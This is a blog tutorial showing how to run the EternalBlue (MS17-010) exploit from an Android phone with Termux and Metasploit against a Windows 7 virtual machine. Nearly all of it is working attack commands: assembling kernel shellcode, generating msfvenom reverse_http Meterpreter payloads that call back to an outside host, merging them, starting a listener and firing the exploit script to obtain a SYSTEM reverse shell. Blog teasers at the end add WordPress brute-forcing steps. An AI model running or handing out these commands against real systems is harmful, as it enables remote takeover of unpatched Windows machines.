[Tutorial]: MS17-010 in Android world

-

MS17-010 in Android world

In this tutorial, i’ll show you guys, how to use the exploit called “Eternalblue” to attack win 7 → win 10, using a android.

 First of all, I would recommend to you learn about what is Eternalblue, and HOW this exploit works, aaand i’m not responsible for your actions. Be careful.

 In this tutorial I used:
Asus zc553kl with Android 7.0 (nougat). [192.168.1.7] 
 
Windows 7 Ultimate 64bit (Virtualbox) [192.168.1.10].

Termux app (https://termux.com/)

Kali Linux (x86)

Hacker keyboard app (Android)


STARTING
First of all you need to download the termux app(on playstore) and install it.

 You can learn a lot on this blog how to use termux app.




Link: https://gauravssnl.wordpress.com/2017/01/15/how-to-use-termux-app-for-android-terminal-emulator-and-linux-environment/
After termux updated, you must to install our friend metasploit-framework.

 Use this script to install it. https://github.com/verluchie/termux-metasploit
Type the follow commands:
Android:$ apt-get install git
Android:$ git clone https://github.com/verluchie/termux-metasploit
Android:$ cd termux-metasploit
Android:$ chmod 777 install.sh
Android:$ sh install.sh
IF YOU GETTING SOME ERROR, PLEASE READ THE MANUAL IN THAT GITHUB WEBSITE, I’M NOT THE DEVELOPER.

 DOWNLOADING EXPLOIT ON KALI LINUX

 Download the exploit here: https://github.com/worawit/MS17-010

 Now in your linux machine, you must to create a .bin shellcode to the exploit.(calm down, you will understand later)

 root@kali:~/MS17-010/shellcode# pwd
/root/MS17-010/shellcode

 root@kali:~/MS17-010/shellcode# ls
eternalblue_kshellcode_x64.asm      
eternalblue_kshellcode_x86.asm       
eternalblue_sc_merge.py

 root@kali:~/MS17-010/shellcode# nasm -f bin eternalblue_kshellcode_x64.asm
root@kali:~/MS17-010/shellcode# nasm -f bin eternalblue_kshellcode_x86.asm

 Now we successfully created the eternalblue kernel shellcode.

 root@kali:~/MS17-010/shellcode# ls
eternalblue_kshellcode_x64     
eternalblue_kshellcode_x64.asm       
eternalblue_kshellcode_x86       
eternalblue_kshellcode_x86.asm       
eternalblue_sc_merge.py

 From that, we need to create now our shellcode to get rev shell.

 root@kali:~/MS17-010/shellcode# msfvenom -p windows/meterpreter/reverse_http    EXITFUNC=thread    LHOST=dummynet.zzux.com    LPORT=5151    -f    raw    -o    sc_x86_msf.bin

 root@kali:~/MS17-010/shellcode# msfvenom -p windows/x64/meterpreter/reverse_http    EXITFUNC=thread    LHOST=dummynet.zzux.com    LPORT=5151    -f    raw    -o    sc_x64_msf.bin


You just need to change the DNS and port.(You can create your DNS here: https://www.changeip.com)

Cool, at this point we have the payload and eternalblue kernel shellcode, let’s get them together.
root@kali:~/MS17-010/shellcode# cat   eternalblue_kshellcode_x64   sc_x64_msf.bin  >   sc_x64.bin
root@kali:~/MS17-010/shellcode# cat   eternalblue_kshellcode_x86   sc_x86_msf.bin  >   sc_x86.bin
root@kali:# python   eternalblue_sc_merge.py   sc_x86.bin sc_x64.bin    sc_all.bin
Okay, with those commands we created the final shellcode to our exploit.

 sc_all.bin must be pass to termux software on the android. You can do it in your linux machine:
root@kali:~/MS17-010/shellcode# python    -m    SimpleHTTPServer 80
and in your termux:
Android:$ wget    <ip>/sc_all.bin
Turn ON Windows machine, and wait for now.



















In your mobile, turn ON the metasploit listener and wait on terminal. Press ctrl+alt+c to create another terminal.(You can change your current terminal pressing ctrl+alt+n)
















Command Used:
Android:$ ./msconsole  -x “use multi/handler; set payload windows/x64/meterpreter/reverse_http;   set    lhost    dummynet.zzux.com;  set    lport 5151;  set    AUTORUNSCRIPT post/windows/manage/migrate; exploit” -q
















And run our exploit:



















Command used:
Android:$ python2.7   eternalblue_exploit7.py    192.168.1.10    sc_all_bin 1
PS: I would recommend place 1 at the end, because if you do more, the windows will crash.


















 
Exploit executed.

















nt authority\system reverse shell \o/
EXPLOITS

Eternalblue_exploit7.py

 -Windows versions affected:

 - Windows 7 SP1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x86
- Windows 2008 SP1 x64
- Windows 2008 SP1 x86

 Eternalblue_exploit8.py

 -Windows versions affected :

 - Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 10 Pro Build 10240 x64
Another way to do that exploit, is by using the ms17-010 from metasploit-framework.


Android:$ msfconsole  -x "use exploit/windows/smb/ms17_010_eternalblue" -q
-Windows versions affected:

 - Windows Server 2008 R2 (x64) All Service Packs
- Windows 7

 Thanks guys, see you in the next post. \o

Comentários

Postar um comentário

Postagens mais visitadas deste blog

[Vulnhub]: Vulnerable docker

-
Vulnerable docker  VM LINK:  https://www.vulnhub.com/entry/vulnerable-docker-1,208/ Hello world, it is my first write up on this blog. First of all, i’m don't speak fluently, and my English is not quite good, maybe I can say wrong words or something. Anyway, lets go to the write up At beginning, I like to do nmap root@kali : #  nmap -sC -sV -A 192.168.1.6 You can notice the ports 22, and 8000 are open, have a look what is inside of 8000 HTTP port. A wordpress website.. with a big text, right? Ooh looks familiar like another ctf challenges, when you have some random text, one website and one wp-login page(in this case). We need to use this pattern: cewl + john + wpscan cewl → create a wordlist based in the website words. john → create rules on that cewl wordlist. wpscan → bruteforce the xmlrpc.php in the wordpress website. You can follow these commands: root@kali: #  cewl 192.168.1.6:8000 -w cewl_wordlists root@kali : #  john --wordli...
Leia mais

[Simple 90's BOF Tricks] Stack buffer overflows advanced | chapter.1

-
Imagem
Hello people around the world! Sorry for the long time to do a new blog post, i had so much work , ctf's , certificates , most people never seen this blog... that's make me really sad too.. whatever .. i'll try to start this tutorial series with objective to share my little knowledge about Stack buffer overflows and related . I have plans to post most of my knowledge acquired during my OSCE , CTF's , self studing and so on . The ideia behind this tutorials series are to explain the most detailed , possible and RESUMED exploitation techniques which are normally used on real world. Those techniques are all outdated ( yes, it is!! most of them )  once all of this stack stuffs are not exploitable anymore on big applications, such as: browsers , kernel drivers , etc . Most of the modern exploits are written to explore the dynamic memory called heap . Those  heap exploits have your own classifications like stack overflows, such as: Use-After-Free , Double-Free , Heap ...
Leia mais